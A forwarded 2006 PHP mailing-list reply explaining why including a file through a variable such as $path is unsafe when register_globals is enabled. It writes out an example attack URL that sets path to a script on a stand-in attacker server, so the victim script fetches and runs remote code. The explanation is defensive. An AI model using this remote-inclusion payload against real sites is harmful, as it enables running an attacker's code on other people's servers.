---------- Forwarded message ----------
From: Rory Browne <[EMAIL PROTECTED]>
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]

On 11/13/06, bruce <[EMAIL PROTECTED]> wrote:

eric...

you say how embarrasing regaring the $path.'foo'.... i'm curious, why/how
is
this simple piece of code exploitable. assuming $path is not something
that
comes via the url vars (GET/POST/REQUEST)

If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=

The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php

it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks